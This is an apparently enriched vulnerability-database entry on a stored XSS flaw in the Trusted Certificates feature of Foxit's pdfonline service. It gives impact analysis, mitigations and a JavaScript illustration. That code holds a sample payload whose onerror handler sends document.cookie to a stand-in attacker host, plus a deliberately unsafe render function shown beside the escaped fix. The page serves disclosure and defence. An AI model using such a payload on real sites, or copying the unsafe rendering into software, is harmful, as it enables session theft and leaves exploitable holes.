CVE-2025-66521: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Foxit Software Inc. pdfonline.foxit.com
A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Trusted Certificates feature. A crafted payload can be injected as the certificate name, which is later rendered into the DOM without proper sanitization. As a result, the injected script executes each time the Trusted Certificates view is loaded.
AI Analysis
Technical Summary
CVE-2025-66521 is a stored cross-site scripting (XSS) vulnerability in the Trusted Certificates feature of Foxit Software Inc.'s pdfonline.foxit.com service. The certificate name supplied when a trusted certificate is added is stored and later inserted into the page's DOM without being encoded for its HTML context, so a name that contains markup or script is interpreted by the browser instead of being displayed as text. An attacker with a low-privileged account on the service stores such a payload once; it then executes every time the Trusted Certificates view is loaded (CWE-79). The advisory does not state whether a stored certificate name is rendered only for the account that added it or for other users as well; the PR:L and UI:R components of the vector mean the attacker needs an account and a victim has to open the view.

Script running in the victim's browser session can read whatever the page's own scripts can read (DOM content, tokens held in localStorage or sessionStorage, cookies not marked HttpOnly) and can issue requests to the service with the victim's ambient credentials. The CVSS v3.1 base score is 6.3 (Medium) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N: network attack vector, low attack complexity, low privileges required, user interaction required, unchanged scope, high confidentiality impact, low integrity impact, no availability impact. The service is reported as affected in all versions before December 1, 2025. No public exploit has been reported, but a stored payload needs no further attacker interaction once saved, which makes the flaw useful for phishing, session hijacking and follow-on actions inside the application. The root cause is missing output encoding when the certificate name is written to the DOM; the absence of server-side validation of the name is a secondary, defense-in-depth gap. Because this is a hosted web service, every user who opens the Trusted Certificates page is exposed, which matters for organizations that rely on Foxit's online PDF tools for certificate management or document workflows.
Potential Impact
For European organizations the primary risk is to confidentiality. Script injected into the Trusted Certificates view runs with the victim's session and can exfiltrate session cookies that are readable from JavaScript, API tokens, and any document or certificate data the page can reach, or perform actions in the application on the victim's behalf. That can lead to account compromise on the service and unauthorized access to documents processed through it; credentials that users reuse elsewhere can then be tried against other services. The integrity impact is rated low: the attacker can alter what the victim sees in the interface, which supports social engineering or phishing, and make limited changes through requests sent from the victim's session, but the advisory describes no direct modification of stored data. Availability is not affected. Sectors with heavy reliance on digital document workflows, such as finance, legal, healthcare and government, are at greater risk because of the sensitivity of their documents and certificates. Since exploitation needs a low-privileged account and a victim who opens the view, a malicious insider or an already compromised account is the realistic starting point. Given the widespread use of Foxit products in Europe, the vulnerability could affect a broad user base and enable targeted attacks on European enterprises and public-sector entities.
Mitigation Recommendations
pdfonline.foxit.com is a service hosted and operated by Foxit, so the code-level fixes (items 1 to 4) are Foxit's to apply; customer organizations can only verify the fix and reduce their exposure (items 5 to 9).

1. Foxit: encode the certificate name for its HTML context at render time, or build the view with text-node APIs (createElement plus textContent) instead of innerHTML. Output encoding, not input filtering, is the fix for CWE-79.
2. Foxit: as defense in depth, validate certificate names on the server against an allowlist of expected characters and a maximum length, and flag or reject already-stored names that contain markup.
3. Foxit: deploy a strict Content Security Policy (no unsafe-inline; nonce- or hash-based script allowlisting) so that injected inline script is blocked even if an encoding gap remains. Customers cannot set response headers for a site they do not operate.
4. Foxit: a web application firewall rule can block common XSS payloads in transit, but it is a stopgap, not a substitute for items 1 to 3.
5. Confirm with Foxit that the fix is deployed; the advisory states that versions before December 1, 2025 are affected.
6. Until that is confirmed, restrict use of the Trusted Certificates feature to the administrators who need it, and have them avoid opening the view from shared or high-privilege accounts.
7. Review the Trusted Certificates entries visible in your accounts for names containing angle brackets, quotes or script-like content, and report any to Foxit.
8. Warn users about unexpected or oddly named certificate entries and give them a way to report anomalies.
9. Watch accounts that use the service for signs of session abuse (sign-ins from new locations, unexpected document access) and rotate sessions or credentials if exploitation is suspected. Include stored-XSS checks on user-supplied display names in the security testing of your own web applications.
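The following is an added illustration of the bug class described in the Technical Summary and of the encoding and validation steps in items 1 and 2 above. It is not Foxit's code: the actual Trusted Certificates render path of pdfonline.foxit.com is not public, so the record shape, the field names, the function names and the length limit are assumptions. It runs under Node.js without a DOM and shows the unsafe string-built render beside the encoded one, a server-side allowlist check for certificate names, and an audit that flags already-stored names containing markup.

```javascript
// Added example, not Foxit's code. Data shape and function names are hypothetical.
// Runs under Node.js; the "render" functions return HTML strings so no DOM is needed.

// Constructed sample payload of the kind a low-privileged user could store as a name.
const CONSTRUCTED_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\' + document.cookie)">';

// Constructed records; the field names are an assumption for this example.
const SAMPLE_CERTIFICATES = [
  { id: 1, name: 'Corporate Root CA', issuer: 'Example Corp', expires: '2030-01-01' },
  { id: 2, name: CONSTRUCTED_PAYLOAD, issuer: 'self-signed', expires: '2030-01-01' },
];

// VULNERABLE (CWE-79): the stored name is concatenated straight into markup. When the
// result is assigned to innerHTML, the browser parses the payload as an <img> element
// and runs its onerror handler every time the view loads.
function renderTrustedCertsUnsafe(certs) {
  return certs
    .map(c => `<tr><td>${c.name}</td><td>${c.issuer}</td><td>${c.expires}</td></tr>`)
    .join('\n');
}

// Contextual output encoding for HTML text and quoted attribute values. '&' is
// replaced first so later replacements cannot be turned back into markup.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// FIXED: every user-controlled field is encoded where it enters the markup, so the
// payload is shown as text and never becomes an element. In browser code, building
// elements with document.createElement and setting textContent achieves the same.
function renderTrustedCertsEscaped(certs) {
  return certs
    .map(c => `<tr><td>${escapeHtml(c.name)}</td><td>${escapeHtml(c.issuer)}</td>` +
              `<td>${escapeHtml(c.expires)}</td></tr>`)
    .join('\n');
}

// Defense in depth, server side: a certificate display name has no reason to contain
// markup. Allow letters, digits, space and a little punctuation, up to 128 characters
// (the character set and limit are assumptions for this example).
const CERT_NAME_RE = /^[\p{L}\p{N} ._()\-]{1,128}$/u;
function isAcceptableCertName(name) {
  return typeof name === 'string' && CERT_NAME_RE.test(name);
}

// Audit of already-stored names, the kind of check an operator runs after shipping the
// fix: returns ids of records whose name contains HTML metacharacters or a javascript: URL.
function findSuspiciousCertNames(certs) {
  const markup = /[<>"'&]|javascript:/i;
  return certs.filter(c => markup.test(c.name)).map(c => c.id);
}

// Stand-alone demo when run directly with `node`.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:\n' + renderTrustedCertsUnsafe(SAMPLE_CERTIFICATES));
  console.log('escaped:\n' + renderTrustedCertsEscaped(SAMPLE_CERTIFICATES));
  console.log('acceptable:', SAMPLE_CERTIFICATES.map(c => isAcceptableCertName(c.name)));
  console.log('suspicious ids:', findSuspiciousCertNames(SAMPLE_CERTIFICATES));
}
```

The allowlist in isAcceptableCertName is deliberately strict; it is a second line of defense, and widening it (for example to permit apostrophes in names) is safe only because escapeHtml handles every character at render time. The audit regex is intentionally broad: it is meant to surface records for a human to look at, not to decide on its own which ones are malicious.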
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: Foxit
- Date Reserved: 2025-12-04T03:37:51.889Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69450fe2c326d36e5368d346
Added to database: 12/19/2025, 8:42:10 AM
Last enriched: 12/26/2025, 9:15:20 AM
Last updated: 2/6/2026, 12:53:35 PM